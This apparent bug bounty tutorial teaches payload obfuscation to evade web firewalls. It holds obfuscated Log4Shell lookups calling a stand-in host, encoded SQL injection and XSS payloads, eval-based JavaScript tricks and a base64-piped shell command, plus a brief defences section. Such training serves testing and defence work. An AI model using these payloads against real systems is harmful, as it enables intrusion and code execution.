The art of payload obfuscation: how to mask malicious scripts and bypass defence mechanisms

March 27, 2025

The art of payload obfuscation

How often have your exploits been blocked by firewalls or neutered by mysterious processes that alter key characters?

This is why payload obfuscation is such a game-changing skill for offensive security testing: by disguising malicious code as harmless data you can bypass security defences and reach your target.

This guide will walk you through everything from the basics of URL encoding and octal encoding to advanced obfuscation methods such as variable expression assignment and obfuscation in shell environments – giving you the tools to outsmart even the toughest security defences.

These skills are invaluable for Bug Bounty Programs, which often simulate real-world hacking conditions by ensuring hunters must overcome defences like web application firewalls (WAFs), input sanitisation and rate limiting.

Mastering these techniques also gives you insights into the inner workings of modern security systems – strengthening both your hacking skills and ability to recommend effective mitigations in your vulnerability reports.

Outline

  • What is payload obfuscation?
  • Payload obfuscation in the wild
    • Log4Shell obfuscation
  • Payload obfuscation via encoding
    • URL encoding
    • Unicode, hex and octal encoding
    • Mix encoding
  • Payload obfuscation via variable expression assignment
  • Payload obfuscation via arrays in request parameters
    • Obfuscation in JavaScript payloads
    • Obfuscation in shell environments
  • Defences and mitigations for payload obfuscation
  • Conclusion: A vital skillset for bypassing the first line of defence
  • References

What is payload obfuscation?

Payload obfuscation can make malicious exploits undetectable to an application’s protection mechanisms, but without changing the payload’s functionality when executed. Pentesters, Bug Bounty hunters and security researchers can therefore exploit vulnerable components that might otherwise have remained protected by web application firewalls (WAFs) or input validation filters.

By obfuscating malicious scripts using encoding, variable manipulation, or unconventional syntax, attackers can bypass pattern-based filters that rely on static signatures.

Payload obfuscation in the wild

Payload obfuscation is a perennial feature of the cat-and-mouse game we see unfolding between cybercriminals and security teams. Advanced persistent threat (APT) groups routinely obfuscation techniques like Base64, XOR, AES, RC4 and custom ciphers to evade detection. The most notorious use of these methods relates to what is widely considered to be the most damaging vulnerability of all time.

Log4Shell obfuscation

Back in 2021, ‘Log4Shell’ (CVE-2021-44228) was discovered in the ubiquitous Java logging package Log4j. The vulnerability spread rapidly and caused alarm due to the vast number of affected systems. Although firewall vendors quickly configured rules that blocked Log4Shell, new obfuscated payloads for Log4shell quickly emerged – illustrating how attackers continually innovate to stay one step ahead of security defences.

Here is the original Log4shell payload:

${jndi:ldap://${java:version}.yourserver.com/a}

Attackers then crafted payloads, like the examples below, that bypassed firewalls and enabled attackers to continue exploiting Log4shell:

Lowercase substitution, string fragmentation, nested resolution

${jndi:${lower:l}${lower:d}a${lower:p}://yourserve${lower:r}:1389/a}

Colon trick (::-), char-by-char assembly, deep nesting

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yourserver.com:1389/a}

Environment variable substitution, default fallback, dynamic protocol construction

${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//yourserver.com/a}

As seen in this examples above, payload obfuscation played a big role for attackers to being able to continue exploit the Log4shell vulnerability.

Payload obfuscation via encoding

Payload obfuscation via encoding conceals the function of malicious payloads by transforming them into encoded formats such as Base64, hex or Unicode.

URL encoding

URL encoding is a popular and effective encoding technique for bug hunters because browsers use URL encoding so extensively. However, URL-encoded data are widely understood by applications because many developers decode URL-encoded data on the server side. For instance, this code…

' OR 1=1-- -

…Might look like this when URL-encoded:

%27%20OR%201%3D1%2D%2D%20%2D

Since applications decode this input multiple times, double URL encoding can be an effective technique to conceal a payload. Double URL encoding can be achieved by encoding the “%” character as “%25”, for instance.

Example of a double URL-encoded payload:

%2527%2520OR%25201%253D1%252D%252D%2520%252D

When the URL is decoded twice, this payload resolves to:

' OR 1=1-- -

Unicode, hex and octal encoding

Unicode, hex and octal encoding can be used in various scenarios, the most common being when a payload is injected directly into a pre-rendered string.

A typical scenario involves mixing server-side code with client-side code. For instance, a code snippet might use server-side PHP in combination with client-side JavaScript to assign a value to a JavaScript variable, such as result.

<script>
var result = "<b>You searched for:</b> <?= htmlspecialchars($_GET['query']) ?>";
// Code... 
document.body.innerHTML = result;
</script>

Since you control the pre-rendered string value, you can inject Unicode, hex and octal encodings. For example, if the HTTP GET parameter query contains a hex-encoded value like \x3C, it will decode to the character <. If this code subsequently inserts the content into the HTML DOM, an attacker can exploit a DOM-based cross-site scripting (XSS) vulnerability using payloads that encode special characters such as:

Unicode payload #1

\u003Csvg onload=alert(1)\u003E

Unicode payload #2

\u{3C}svg onload=alert(1)\u{3E}

Hex payload

\x3Csvg onload=alert(1)\x3E

Octal payload

\074svg onload=alert(1)\076

When any of these payloads are inserted into the JavaScript variable result and then added to the HTML DOM, they will be rendered as:

<svg onload=alert(1)>

This payload will then successfully infect the vulnerable application with client-side JavaScript code (also known as XSS). These examples illustrate how encodings can effectively hide malicious intent within a payload.

Mixed encoding

The most effective way to craft a robust obfuscated payload is to mix multiple encoding methods. Multi-layered encoding forces protective mechanisms to process multiple decoding methods simultaneously, making it significantly harder for them to detect hidden payloads.

As an example, the obfuscated payload below combines the encoding techniques discussed above:

\u{3C}svg%20onload\075al\u0065rt(1)\x3E

Note that %20 represents a space in URL encoding, while the + character is also a valid representation of a space when injected in the URL query.

To learn some practical encoding techniques, supported by hands-on labs, check out our Dojo WAF bypass modules on encoding and transformation.

Payload obfuscation via variable expression assignment

Payload obfuscation via variable expression assignment involves dynamically constructing payloads by assigning values to variables based on expressions composed of variables, constants, operators and functions. This technique makes payloads much less predictable and more difficult for security defences to detect.

For example, to execute the JavaScript code alert(1), you could use variable expression assignment to construct the code (combining variables a, b, c and d) and then execute it using the eval function:

a="al";b="ert";c="(1";d=")";eval(a+b+c+d);

These lines dynamically assemble the string "alert(1)" by concatenating parts stored in different variables, and then execute it with eval, effectively hiding the true intent from static analysis.

Payload obfuscation via arrays in request parameters

In web applications, HTTP request parameters – such as URL queries, POST body data or cookies – are sometimes accepted as an array rather than a single value. In these scenarios, attackers can split a payload into multiple pieces, leveraging array inputs to bypass standard filtering methods.

Imagine a scenario where a HTTP GET parameter (eg id) is vulnerable to SQL injection. A PHP application accepts the GET parameter as either a single value or an array.

The PHP code might be written similarly to the following example:

<?php
$ids = join(',', $_GET["id"]);
$sql_stmt = "SELECT * FROM users WHERE id IN (". $ids .")";
$result = $conn->query($sql_stmt);
// Code...
?>

To execute a SQL injection payload such as…

1) OR 1=(SELECT SLEEP(4)) -- -

…We can take advantage of the application accepting an array for the GET parameter and craft a payload similar to this:

http://example.com/?id[]=1)/*&id[]=*/OR/*&id[]=*/1=(SELECT/*&id[]=*/SLEEP(4))+--+-

When PHP constructs the variable ids from the GET parameter id (when provided as an array), it will result in the following:

1)/*,*/OR/*,*/1=(SELECT/*,*/SLEEP(4)) -- -

Using SQL multi-line comments (/** ... **/) allows us to handle commas (,) added by PHP’s join function between array elements. This technique creates an obfuscated payload capable of exploiting SQL injection vulnerabilities by confusing the system’s handling of array inputs.

Obfuscation in JavaScript payloads

JavaScript, a versatile and powerful programming language, makes payload obfuscation particularly effective due to several key features. In particular, it can be executed on both client and server sides, while its capability to manipulate the HTML DOM enables advanced obfuscation techniques for crafting XSS payloads.

One useful obfuscation method is to use pure Unicode to invoke a function. For example, to execute the command print() in JavaScript, you can use the following approaches:

print()

Above is the normal function call. The following Unicode-escaped version converts to "print()" at runtime, masking the actual function name:

\u0070\u0072\u0069\u006E\u0074()

This mixed variant further fragments the name:

\u0070ri\u006Et()

You can also execute JavaScript from a string – using, for example, eval or Function – to further obscure the payload:

c="ale";Function(c+"rt()")()

Obfuscation in shell environments

When dealing with vulnerabilities like command injections executed in a shell environment (eg bash, sh, ash), a wide range of advanced payload obfuscation techniques can be employed. These techniques exploit shell features such as wildcards, quotes and global variables (eg $IFS, which serves as a field separator).

For example, if you want to execute the system command id, you can simply do so using the following command:

id

Alternatively, this example uses shell quoting with hexadecimal escapes to produce "id" at runtime:

$'\x69\x64'

The final payload further obfuscates the command by fragmenting and reassembling it through a series of string manipulations, making it more challenging for static detection systems to parse:

{e'c'ho,a'W''Q'K}|{bas'e'64,-d}|s''h

Defences and mitigations for payload obfuscation

As attackers become increasingly sophisticated at embedding harmful data within seemingly safe inputs, a robust, layered defence strategy only becomes more essential. This strategy should start with thorough validation and sanitisation of all incoming data, which means processing only explicitly approved formats and converting malicious chars to safe equivalents before rendering, among other measures.

Modern firewalls are designed to do more than basic checks; they are equipped to also decode mixed formats – such as those combining URL, Unicode, hexadecimal and octal – to reveal hidden threats. Additionally, smart monitoring tools can continuously track unusual activity and trigger alerts when anomalies are detected. Such proactive measures enable your team to respond swiftly to potential attacks before any damage occurs.

In addition, writing secure code using techniques such as prepared statements and enforcing strict content policies significantly reduces vulnerabilities. Moreover, implementing overlapping security measures and segmenting networks can help contain breaches should attacks manage to slip through initial defences.

Regular system updates and ongoing staff training keep your defences up to date and capable of tackling evolving threats. Ensuring that your team is well-informed about the latest attack methods and defence techniques is crucial for maintaining a secure environment.

Conclusion: A vital skillset for bypassing the first line of defence

Payload obfuscation is a vital hacking skill. Log4shell, for instance, continued to be widely exploited thanks to these techniques long after firewalls were configured to protect against the initial payload. Pentesters and Bug Bounty hunters alike must emulate these techniques to find valid vulnerabilities in target systems.

Obfuscation techniques vary depending on the environment and programming language, and understanding their underlying principles not only helps bug hunters bypass security measures, but also helps them advise defenders on how to strengthen their systems.

We have explored various methods for performing payload obfuscation in PHP, JavaScript and shell environments. By applying this knowledge, ethical hackers can enhance their ability to bypass protection mechanisms during Bug Bounty engagements.

References